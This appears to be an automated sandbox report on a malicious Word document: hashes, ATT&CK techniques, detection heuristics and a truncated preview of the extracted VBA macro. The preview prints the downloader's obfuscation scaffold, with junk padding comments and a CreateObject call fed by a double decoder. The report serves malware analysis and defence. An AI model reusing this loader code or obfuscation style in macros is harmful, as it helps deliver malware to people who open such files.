Office (OLE) malware analysis — malicious · fe9c9583ab443665

MALICIOUS

Office (OLE)

123.4 KB Created: 2019-10-23 19:42:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 641f2ef2ba74127c59ea57940b048472 SHA-1: e978b4a6d78adc9fbc9b55b2ade60ff3aa781573 SHA-256: fe9c9583ab4436654eca500f40a6abef2fb268a7b6ac5cefec4684d0affd8123

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Reverse Engineer

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, indicating malicious intent. The presence of the AutoOpen macro and CreateObject calls further supports this. The VBA script is heavily obfuscated and truncated, making it difficult to determine the exact payload, but the overall pattern suggests it's designed to download and execute a second-stage malicious file.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7354127-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7354127-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 66690 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	66690 bytes
SHA-256: `f81b280cb8bcedabdd376bdf37eddc0fb27208503ef08829ae015533f9ed8145`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Btjsbdzubgg" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Rhzkhlnajmtj, 0, 0, MSForms, CommandButton" Attribute VB_Control = "Kpazynozqa, 1, 1, MSForms, CommandButton" Attribute VB_Control = "Xniluihtt, 2, 2, MSForms, CommandButton" Attribute VB_Control = "Mugdoaxr, 3, 3, MSForms, CommandButton" Attribute VB_Control = "Pmnegcplsn, 4, 4, MSForms, CommandButton" Attribute VB_Control = "Jyqdolzy, 5, 5, MSForms, CommandButton" Attribute VB_Control = "Hqxftozpgzqh, 6, 6, MSForms, CommandButton" Attribute VB_Control = "Ssspihgt, 7, 7, MSForms, CommandButton" Attribute VB_Name = "Zlfvspdjm" Function Abraham(AbrahamA) On Error Resume Next ''' Zych, Paszkowski and Jedrzejczak Suite 851 Northeast Ostrowski - Szczygiel Suite 248 West Szvtexqkf = Rnd(340) ''' Zak, Makowski and Stawicki Suite 628 Northwest Tokarski, Florczak and Malec Suite 069 West Efdgmmeqohoro = CBool(48) ''' Kalinowski, Kowalczyk and Robak Suite 188 East Bochenek LLC Apt. 367 Northwest Fgoauzeizfbb = CDbl(298) Ydchbhqneo = Mtadhhqmsj ''' Graczyk - Ciesla Suite 345 Southeast Piwowarczyk, Lukaszewski and Borek Suite 628 Southeast Yazwdaklo = Log(740) ''' Misiak - Borowiec Apt. 139 East Swiderski - Serafin Apt. 455 Southeast Emkmwcrczth = Round(398) ''' Przybylski, Kowalewski and Wasilewski Suite 698 Southeast Lis, Wolak and Sobieraj Apt. 686 Northwest Hwxuldtpgx = Sin("Internal802 Rau Knoll, North Freedabury, Netherlands") ''' Bartkowiak, Podgórski and Lesiak Apt. 827 Southwest Sokól - Rutkowski Apt. 133 Southwest Set Abraham = CreateObject(Qqvayopuk(Qqvayopuk(AbrahamA))) ''' Szatkowski, Zyla and Filipiak Suite 613 South Swiatek, Kowal and Bielski Apt. 848 Northwest Ejxueeyhzvh = Rnd(537) ''' Bakowski - Lipski Suite 568 Northwest Chudzik - Czyz Apt. 354 West Eerlrzbivlg = CSng(924) ''' Bartczak, Piatek and Leszczynski Suite 341 Southeast Grudzien and Sons Suite 082 Northeast Ayxpxflk = CInt(357) Lkwpitqlab = Xywzspeixrhdd ''' Szyszka - Galka Apt. 323 South Florek Inc Apt. 844 Southwest Kxcsdhrfbu = Sqr(447) ''' Pietruszka - Tarnowski Suite 371 Northeast Robak LLC Apt. 483 East Pfzgllcaysxn = Oct(625) ''' Tomczyk, Zablocki and Pluta Apt. 037 South Szwed Inc Apt. 905 Southeast Noudtlijf = CStr("Salad") ''' Jackowski - Krukowski Apt. 426 Northwest Brzezinski - Poplawski Suite 882 Southeast End Function Function Wfdbzwna() On Error Resume Next ''' Jedrzejczak, Luczak and Mackowiak Suite 653 North Frackowiak - Wilczynski Suite 137 Southwest Yhjmbpamag = Atn(997) ''' Borowiec, Nawrocki and Sliwa Apt. 352 North Zak - Paszkowski Suite 425 West Zpmqryaptlghc = Cos(979) ''' Prus - Banas Suite 977 North Bieniek, Budzinski and Stawicki Suite 479 Southeast Jwftugyognq = Atn(111) Cxndrqddf = Gtrrnbbjvbr ''' Stachowiak LLC Suite 693 South Andrzejczak, Matusiak and Radomski Apt. 993 Northeast Mrqabgdassmv = Atn(91) ''' Palka - Pluta Suite 738 Southwest Kacprzak LLC Apt. 322 Northwest Qmckdyrn = CStr(990) ''' Jagiello LLC Suite 587 Northwest Dlugosz, Sienkiewicz and Golec Apt. 701 West Hbflhkglhsq = CInt("Sausages") ''' Skiba Inc Apt. 844 Southeast Kruszewski, Osinski and Wilczek Suite 472 North ''' Rogowski and Sons Apt. 079 North Michalczyk LLC Suite 542 South Wewpuhoqgea = Hex(946) ''' Jackowski, Maciejewski and Drabik Apt. 380 North Kucharczyk, Cieslik and Sitek Suite 799 South Jiebufazgme = Log(581) ''' Kolasa, Sochacki and Andrzejewski Apt. 912 West Wilczynski, Furman and Kowalczuk Suite 358 East Sianelkstyk = Log(474) Nuccflmkhgdn = Iqprsyeofp ''' Czyz LLC Suite 934 South Staniszewski - Jarosz Apt. 867 East Paypktgc = Int(385) ''' Urbaniak, Michalski and Luczak Apt. 590 Southeast Dobrowolski, Slowinski and Janik Suite 710 Northeast Wdgsefkcx = Rnd(212) ''' Stachurski, Pilat and Cichon Apt. 466 Northeast Zych - Biernacki Apt. 242 E ... (truncated)

SHA-256: f81b280cb8bcedabdd376bdf37eddc0fb27208503ef08829ae015533f9ed8145

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Btjsbdzubgg"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Rhzkhlnajmtj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Kpazynozqa, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Xniluihtt, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Mugdoaxr, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Pmnegcplsn, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Jyqdolzy, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Hqxftozpgzqh, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Ssspihgt, 7, 7, MSForms, CommandButton"

Attribute VB_Name = "Zlfvspdjm"
Function Abraham(AbrahamA)
On Error Resume Next
   ''' Zych, Paszkowski and Jedrzejczak Suite 851 Northeast Ostrowski - Szczygiel Suite 248 West
Szvtexqkf = Rnd(340)
''' Zak, Makowski and Stawicki Suite 628 Northwest Tokarski, Florczak and Malec Suite 069 West
Efdgmmeqohoro = CBool(48)
''' Kalinowski, Kowalczyk and Robak Suite 188 East Bochenek LLC Apt. 367 Northwest
Fgoauzeizfbb = CDbl(298)
Ydchbhqneo = Mtadhhqmsj
''' Graczyk - Ciesla Suite 345 Southeast Piwowarczyk, Lukaszewski and Borek Suite 628 Southeast
Yazwdaklo = Log(740)
''' Misiak - Borowiec Apt. 139 East Swiderski - Serafin Apt. 455 Southeast
Emkmwcrczth = Round(398)
''' Przybylski, Kowalewski and Wasilewski Suite 698 Southeast Lis, Wolak and Sobieraj Apt. 686 Northwest
Hwxuldtpgx = Sin("Internal802 Rau Knoll, North Freedabury, Netherlands")
''' Bartkowiak, Podgórski and Lesiak Apt. 827 Southwest Sokól - Rutkowski Apt. 133 Southwest
Set Abraham = CreateObject(Qqvayopuk(Qqvayopuk(AbrahamA)))
   ''' Szatkowski, Zyla and Filipiak Suite 613 South Swiatek, Kowal and Bielski Apt. 848 Northwest
Ejxueeyhzvh = Rnd(537)
''' Bakowski - Lipski Suite 568 Northwest Chudzik - Czyz Apt. 354 West
Eerlrzbivlg = CSng(924)
''' Bartczak, Piatek and Leszczynski Suite 341 Southeast Grudzien and Sons Suite 082 Northeast
Ayxpxflk = CInt(357)
Lkwpitqlab = Xywzspeixrhdd
''' Szyszka - Galka Apt. 323 South Florek Inc Apt. 844 Southwest
Kxcsdhrfbu = Sqr(447)
''' Pietruszka - Tarnowski Suite 371 Northeast Robak LLC Apt. 483 East
Pfzgllcaysxn = Oct(625)
''' Tomczyk, Zablocki and Pluta Apt. 037 South Szwed Inc Apt. 905 Southeast
Noudtlijf = CStr("Salad")
''' Jackowski - Krukowski Apt. 426 Northwest Brzezinski - Poplawski Suite 882 Southeast
End Function
Function Wfdbzwna()
On Error Resume Next
   ''' Jedrzejczak, Luczak and Mackowiak Suite 653 North Frackowiak - Wilczynski Suite 137 Southwest
Yhjmbpamag = Atn(997)
''' Borowiec, Nawrocki and Sliwa Apt. 352 North Zak - Paszkowski Suite 425 West
Zpmqryaptlghc = Cos(979)
''' Prus - Banas Suite 977 North Bieniek, Budzinski and Stawicki Suite 479 Southeast
Jwftugyognq = Atn(111)
Cxndrqddf = Gtrrnbbjvbr
''' Stachowiak LLC Suite 693 South Andrzejczak, Matusiak and Radomski Apt. 993 Northeast
Mrqabgdassmv = Atn(91)
''' Palka - Pluta Suite 738 Southwest Kacprzak LLC Apt. 322 Northwest
Qmckdyrn = CStr(990)
''' Jagiello LLC Suite 587 Northwest Dlugosz, Sienkiewicz and Golec Apt. 701 West
Hbflhkglhsq = CInt("Sausages")
''' Skiba Inc Apt. 844 Southeast Kruszewski, Osinski and Wilczek Suite 472 North
   ''' Rogowski and Sons Apt. 079 North Michalczyk LLC Suite 542 South
Wewpuhoqgea = Hex(946)
''' Jackowski, Maciejewski and Drabik Apt. 380 North Kucharczyk, Cieslik and Sitek Suite 799 South
Jiebufazgme = Log(581)
''' Kolasa, Sochacki and Andrzejewski Apt. 912 West Wilczynski, Furman and Kowalczuk Suite 358 East
Sianelkstyk = Log(474)
Nuccflmkhgdn = Iqprsyeofp
''' Czyz LLC Suite 934 South Staniszewski - Jarosz Apt. 867 East
Paypktgc = Int(385)
''' Urbaniak, Michalski and Luczak Apt. 590 Southeast Dobrowolski, Slowinski and Janik Suite 710 Northeast
Wdgsefkcx = Rnd(212)
''' Stachurski, Pilat and Cichon Apt. 466 Northeast Zych - Biernacki Apt. 242 E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.